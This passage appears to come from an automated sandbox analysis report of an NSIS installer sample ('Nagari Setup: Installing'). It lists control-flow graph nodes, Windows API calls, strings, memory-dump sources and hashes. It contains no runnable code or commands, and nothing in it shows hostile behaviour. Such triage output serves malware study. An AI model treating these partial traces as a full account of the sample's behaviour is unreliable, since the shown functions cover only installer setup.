call 405ffc SetWindowTextA call 401389 262->264 263->264 264->204 275 403f08-403f0a 264->275 275->204 276 403f10-403f14 275->276 277 403f33-403f47 DestroyWindow 276->277 278 403f16-403f1c 276->278 277->214 279 403f4d-403f7a CreateDialogParamA 277->279 278->203 280 403f22-403f28 278->280 279->214 281 403f80-403fd7 call 404068 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 279->281 280->204 282 403f2e 280->282 281->203 287 403fd9-403fec ShowWindow call 4040b4 281->287 282->203 289 403ff1 287->289 289->214
                                                                                                                                      APIs
                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403BD0
                                                                                                                                      • ShowWindow.USER32(?), ref: 00403BED
                                                                                                                                      • DestroyWindow.USER32 ref: 00403C01
                                                                                                                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403C1D
                                                                                                                                      • GetDlgItem.USER32(?,?), ref: 00403C3E
                                                                                                                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C52
                                                                                                                                      • IsWindowEnabled.USER32(00000000), ref: 00403C59
                                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 00403D07
                                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 00403D11
                                                                                                                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403D2B
                                                                                                                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D7C
                                                                                                                                      • GetDlgItem.USER32(?,00000003), ref: 00403E22
                                                                                                                                      • ShowWindow.USER32(00000000,?), ref: 00403E43
                                                                                                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403E55
                                                                                                                                      • EnableWindow.USER32(?,?), ref: 00403E70
                                                                                                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E86
                                                                                                                                      • EnableMenuItem.USER32(00000000), ref: 00403E8D
                                                                                                                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403EA5
                                                                                                                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403EB8
                                                                                                                                      • lstrlenA.KERNEL32(Nagari Setup: Installing,?,Nagari Setup: Installing,00000000), ref: 00403EE2
                                                                                                                                      • SetWindowTextA.USER32(?,Nagari Setup: Installing), ref: 00403EF1
                                                                                                                                      • ShowWindow.USER32(?,0000000A), ref: 00404025
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                      • String ID: Nagari Setup: Installing
                                                                                                                                      • API String ID: 3282139019-2059581374
                                                                                                                                      • Opcode ID: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                                                                                                                      • Instruction ID: ba3e3afbb1df49eb3663f2526bbc67ab17a8ece20d2805bf2467eb782e73bce3
                                                                                                                                      • Opcode Fuzzy Hash: e57483be0e8f0953cc8724a3e8c8ea21599a840bb85b0af5ee6d9011d8646a3c
                                                                                                                                      • Instruction Fuzzy Hash: FEC1AEB2604205BBDB206F61ED49D2B7A6CFB85706F40443EF641B11F1C779A942EB2E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 290 4037f7-40380f call 406372 293 403811-403821 call 405f38 290->293 294 403823-403854 call 405ec1 290->294 303 403877-4038a0 call 403abc call 405a60 293->303 299 403856-403867 call 405ec1 294->299 300 40386c-403872 lstrcatA 294->300 299->300 300->303 308 4038a6-4038ab 303->308 309 403927-40392f call 405a60 303->309 308->309 310 4038ad-4038d1 call 405ec1 308->310 315 403931-403938 call 405ffc 309->315 316 40393d-403962 LoadImageA 309->316 310->309 317 4038d3-4038d5 310->317 315->316 319 4039e3-4039eb call 40140b 316->319 320 403964-403994 RegisterClassA 316->320 321 4038e6-4038f2 lstrlenA 317->321 322 4038d7-4038e4 call 40599d 317->322 331 4039f5-403a00 call 403abc 319->331 332 4039ed-4039f0 319->332 323 403ab2 320->323 324 40399a-4039de SystemParametersInfoA CreateWindowExA 320->324 328 4038f4-403902 lstrcmpiA 321->328 329 40391a-403922 call 405972 call 405fda 321->329 322->321 327 403ab4-403abb 323->327 324->319 328->329 335 403904-40390e GetFileAttributesA 328->335 329->309 343 403a06-403a20 ShowWindow call 406304 331->343 344 403a89-403a8a call 4051d3 331->344 332->327 338 403910-403912 335->338 339 403914-403915 call 4059b9 335->339 338->329 338->339 339->329 351 403a22-403a27 call 406304 343->351 352 403a2c-403a3e GetClassInfoA 343->352 347 403a8f-403a91 344->347 349 403a93-403a99 347->349 350 403aab-403aad call 40140b 347->350 349->332 353 403a9f-403aa6 call 40140b 349->353 350->323 351->352 356 403a40-403a50 GetClassInfoA RegisterClassA 352->356 357 403a56-403a79 DialogBoxParamA call 40140b 352->357 353->332 356->357 361 403a7e-403a87 call 403747 357->361 361->327
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00406372: GetModuleHandleA.KERNEL32(?,?,?,004032A8,0000000A), ref: 00406384
                                                                                                                                        • Part of subcall function 00406372: GetProcAddress.KERNEL32(00000000,?), ref: 0040639F
                                                                                                                                      • lstrcatA.KERNEL32(1033,Nagari Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nagari Setup: Installing,00000000,00000002,751D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\MaMsKRmgXZ.exe",00000000), ref: 00403872
                                                                                                                                      • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens,1033,Nagari Setup: Installing,80000001,Control Panel\Desktop\ResourceLocale,00000000,Nagari Setup: Installing,00000000,00000002,751D3410), ref: 004038E7
                                                                                                                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 004038FA
                                                                                                                                      • GetFileAttributesA.KERNEL32(Call), ref: 00403905
                                                                                                                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens), ref: 0040394E
                                                                                                                                        • Part of subcall function 00405F38: wsprintfA.USER32 ref: 00405F45
                                                                                                                                      • RegisterClassA.USER32(00422EA0), ref: 0040398B
                                                                                                                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004039A3
                                                                                                                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 004039D8
                                                                                                                                      • ShowWindow.USER32(00000005,00000000), ref: 00403A0E
                                                                                                                                      • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 00403A3A
                                                                                                                                      • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 00403A47
                                                                                                                                      • RegisterClassA.USER32(00422EA0), ref: 00403A50
                                                                                                                                      • DialogBoxParamA.USER32(?,00000000,00403B94,00000000), ref: 00403A6F
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                      • String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens$Call$Control Panel\Desktop\ResourceLocale$Nagari Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                                                      • API String ID: 1975747703-8243168
                                                                                                                                      • Opcode ID: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                                                                                                                      • Instruction ID: cc9ff768997195dfc6b08b7ed0d0e3ca7810037f4103f2fdd35eeb1d807c43ce
                                                                                                                                      • Opcode Fuzzy Hash: a2a89361b445a099ea431d97f26b4be8e8633abf330fc856fce069af7e92bfea
                                                                                                                                      • Instruction Fuzzy Hash: 1961C4B07442007EE620AF659D45F2B3AACEB4475AB40447EF941B22E2D7BC9D02DA2D
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 364 402dc4-402e12 GetTickCount GetModuleFileNameA call 405b73 367 402e14-402e19 364->367 368 402e1e-402e4c call 405fda call 4059b9 call 405fda GetFileSize 364->368 370 402ff4-402ff8 367->370 376 402e52 368->376 377 402f37-402f45 call 402d60 368->377 379 402e57-402e6e 376->379 383 402f47-402f4a 377->383 384 402f9a-402f9f 377->384 381 402e70 379->381 382 402e72-402e7b call 4031d7 379->382 381->382 390 402fa1-402fa9 call 402d60 382->390 391 402e81-402e88 382->391 386 402f4c-402f64 call 4031ed call 4031d7 383->386 387 402f6e-402f98 GlobalAlloc call 4031ed call 402ffb 383->387 384->370 386->384 413 402f66-402f6c 386->413 387->384 411 402fab-402fbc 387->411 390->384 395 402f04-402f08 391->395 396 402e8a-402e9e call 405b2e 391->396 401 402f12-402f18 395->401 402 402f0a-402f11 call 402d60 395->402 396->401 410 402ea0-402ea7 396->410 407 402f27-402f2f 401->407 408 402f1a-402f24 call 406429 401->408 402->401 407->379 412 402f35 407->412 408->407 410->401 417 402ea9-402eb0 410->417 418 402fc4-402fc9 411->418 419 402fbe 411->419 412->377 413->384 413->387 417->401 420 402eb2-402eb9 417->420 421 402fca-402fd0 418->421 419->418 420->401 422 402ebb-402ec2 420->422 421->421 423 402fd2-402fed SetFilePointer call 405b2e 421->423 422->401 424 402ec4-402ee4 422->424 427 402ff2 423->427 424->384 426 402eea-402eee 424->426 428 402ef0-402ef4 426->428 429 402ef6-402efe 426->429 427->370 428->412 428->429 429->401 430 402f00-402f02 429->430 430->401
                                                                                                                                      APIs
                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402DD5
                                                                                                                                      • GetModuleFileNameA.KERNELBASE(00000000,C:\Users\user\Desktop\MaMsKRmgXZ.exe,00000400), ref: 00402DF1
                                                                                                                                        • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 00405B77
                                                                                                                                        • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B99
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MaMsKRmgXZ.exe,C:\Users\user\Desktop\MaMsKRmgXZ.exe,80000000,00000003), ref: 00402E3D
                                                                                                                                      • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00402F73
                                                                                                                                      Strings
                                                                                                                                      • Null, xrefs: 00402EBB
                                                                                                                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                                                                                                                      • soft, xrefs: 00402EB2
                                                                                                                                      • C:\Users\user\Desktop, xrefs: 00402E1F, 00402E24, 00402E2A
                                                                                                                                      • "C:\Users\user\Desktop\MaMsKRmgXZ.exe", xrefs: 00402DC4
                                                                                                                                      • Error launching installer, xrefs: 00402E14
                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
                                                                                                                                      • C:\Users\user\Desktop\MaMsKRmgXZ.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
                                                                                                                                      • Inst, xrefs: 00402EA9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                                                      • String ID: "C:\Users\user\Desktop\MaMsKRmgXZ.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MaMsKRmgXZ.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                                                      • API String ID: 2803837635-3633788662
                                                                                                                                      • Opcode ID: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
                                                                                                                                      • Instruction ID: 90621c4e807be281ea96420bab05d42ad29c2ea1f6fd119d4e9c070f99f8684f
                                                                                                                                      • Opcode Fuzzy Hash: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
                                                                                                                                      • Instruction Fuzzy Hash: 1A51F771A00216ABDF209F61DE89B9E7BB8EB54355F50403BF900B72C1C6BC9E4197AD
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 652 405ffc-406007 653 406009-406018 652->653 654 40601a-406030 652->654 653->654 655 406221-406225 654->655 656 406036-406041 654->656 658 406053-40605d 655->658 659 40622b-406235 655->659 656->655 657 406047-40604e 656->657 657->655 658->659 660 406063-40606a 658->660 661 406240-406241 659->661 662 406237-40623b call 405fda 659->662 663 406070-4060a4 660->663 664 406214 660->664 662->661 666 4061c1-4061c4 663->666 667 4060aa-4060b4 663->667 668 406216-40621c 664->668 669 40621e-406220 664->669 672 4061f4-4061f7 666->672 673 4061c6-4061c9 666->673 670 4060b6-4060ba 667->670 671 4060ce 667->671 668->655 669->655 670->671 676 4060bc-4060c0 670->676 679 4060d5-4060dc 671->679 674 406205-406212 lstrlenA 672->674 675 4061f9-406200 call 405ffc 672->675 677 4061d9-4061e5 call 405fda 673->677 678 4061cb-4061d7 call 405f38 673->678 674->655 675->674 676->671 681 4060c2-4060c6 676->681 690 4061ea-4061f0 677->690 678->690 683 4060e1-4060e3 679->683 684 4060de-4060e0 679->684 681->671 686 4060c8-4060cc 681->686 688 4060e5-406100 call 405ec1 683->688 689 40611c-40611f 683->689 684->683 686->679 698 406105-406108 688->698 691 406121-40612d GetSystemDirectoryA 689->691 692 40612f-406132 689->692 690->674 694 4061f2 690->694 695 4061a3-4061a6 691->695 696 406134-406142 GetWindowsDirectoryA 692->696 697 40619f-4061a1 692->697 699 4061b9-4061bf call 406244 694->699 695->699 701 4061a8-4061ac 695->701 696->697 697->695 700 406144-40614e 697->700 698->701 702 40610e-406117 call 405ffc 698->702 699->674 707 406150-406153 700->707 708 406168-40617e SHGetSpecialFolderLocation 700->708 701->699 705 4061ae-4061b4 lstrcatA 701->705 702->695 705->699 707->708 710 406155-40615c 707->710 711 406180-40619a SHGetPathFromIDListA CoTaskMemFree 708->711 712 40619c 708->712 713 406164-406166 710->713 711->695 711->712 712->697 713->695 713->708
                                                                                                                                      APIs
                                                                                                                                      • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406127
                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000), ref: 0040613A
                                                                                                                                      • SHGetSpecialFolderLocation.SHELL32(00405139,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000), ref: 00406176
                                                                                                                                      • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406184
                                                                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00406190
                                                                                                                                      • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061B4
                                                                                                                                      • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,00000000,004168C0,00000000), ref: 00406206
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                      • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                      • API String ID: 717251189-3542395414
                                                                                                                                      • Opcode ID: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                                                                                                                      • Instruction ID: f6f0e3a74e6b455581cb0d86726a6c3d239f08f65b325d122068a3aaf356d786
                                                                                                                                      • Opcode Fuzzy Hash: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                                                                                                                      • Instruction Fuzzy Hash: F4610571A00115ABEF20AF64DC84B7A3BA4DB55314F12417FEA03BA2D2C23C4962DB5E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 783 401759-40177c call 402b2c call 4059df 788 401786-401798 call 405fda call 405972 lstrcatA 783->788 789 40177e-401784 call 405fda 783->789 794 40179d-4017a3 call 406244 788->794 789->794 799 4017a8-4017ac 794->799 800 4017ae-4017b8 call 4062dd 799->800 801 4017df-4017e2 799->801 808 4017ca-4017dc 800->808 809 4017ba-4017c8 CompareFileTime 800->809 803 4017e4-4017e5 call 405b4e 801->803 804 4017ea-401806 call 405b73 801->804 803->804 811 401808-40180b 804->811 812 40187e-4018a7 call 405101 call 402ffb 804->812 808->801 809->808 813 401860-40186a call 405101 811->813 814 40180d-40184f call 405fda * 2 call 405ffc call 405fda call 4056f6 811->814 826 4018a9-4018ad 812->826 827 4018af-4018bb SetFileTime 812->827 824 401873-401879 813->824 814->799 848 401855-401856 814->848 828 4029c1 824->828 826->827 830 4018c1-4018cc CloseHandle 826->830 827->830 834 4029c3-4029c7 828->834 832 4018d2-4018d5 830->832 833 4029b8-4029bb 830->833 836 4018d7-4018e8 call 405ffc lstrcatA 832->836 837 4018ea-4018ed call 405ffc 832->837 833->828 841 4018f2-402349 836->841 837->841 846 40234e-402353 841->846 847 402349 call 4056f6 841->847 846->834 847->846 848->824 849 401858-401859 848->849 849->813
                                                                                                                                      APIs
                                                                                                                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae,00000000,00000000,00000031), ref: 00401798
                                                                                                                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae,00000000,00000000,00000031), ref: 004017C2
                                                                                                                                        • Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7
                                                                                                                                        • Part of subcall function 00405101: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                                                                        • Part of subcall function 00405101: lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                                                                                                        • Part of subcall function 00405101: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                                                                        • Part of subcall function 00405101: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll), ref: 0040516F
                                                                                                                                        • Part of subcall function 00405101: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                                                                        • Part of subcall function 00405101: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                                                                        • Part of subcall function 00405101: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.9886207024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.9886159712.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886254668.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886302133.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.9886554545.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_MaMsKRmgXZ.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp$C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Feculae$Call
                                                                                                                                      • API String ID: 1941528284-709486518
                                                                                                                                      • Opcode ID: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
                                                                                                                                      • Instruction ID: a8f8d2e71aafd7953ecb4fd9af401e61999b8e286ce35665580707d8cc6a98aa
                                                                                                                                      • Opcode Fuzzy Hash: c6da4502b6adcf321318d0f1773259c573a0bb333ddf9e97089b2f5c1e78f574
                                                                                                                                      • Instruction Fuzzy Hash: BC41D371A0451ABACB107FA5DC45D9F3AB9EF05329B20823BF411F10E1C63C8A419B6E
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 850 405101-405116 851 4051cc-4051d0 850->851 852 40511c-40512e 850->852 853 405130-405134 call 405ffc 852->853 854 405139-405145 lstrlenA 852->854 853->854 856 405162-405166 854->856 857 405147-405157 lstrlenA 854->857 859 405175-405179 856->859 860 405168-40516f SetWindowTextA 856->860 857->851 858 405159-40515d lstrcatA 857->858 858->856 861 40517b-4051bd SendMessageA * 3 859->861 862 4051bf-4051c1 859->862 860->859 861->862 862->851 863 4051c3-4051c6 862->863 863->851
                                                                                                                                      APIs
                                                                                                                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                                                                      • lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsxC4F6.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
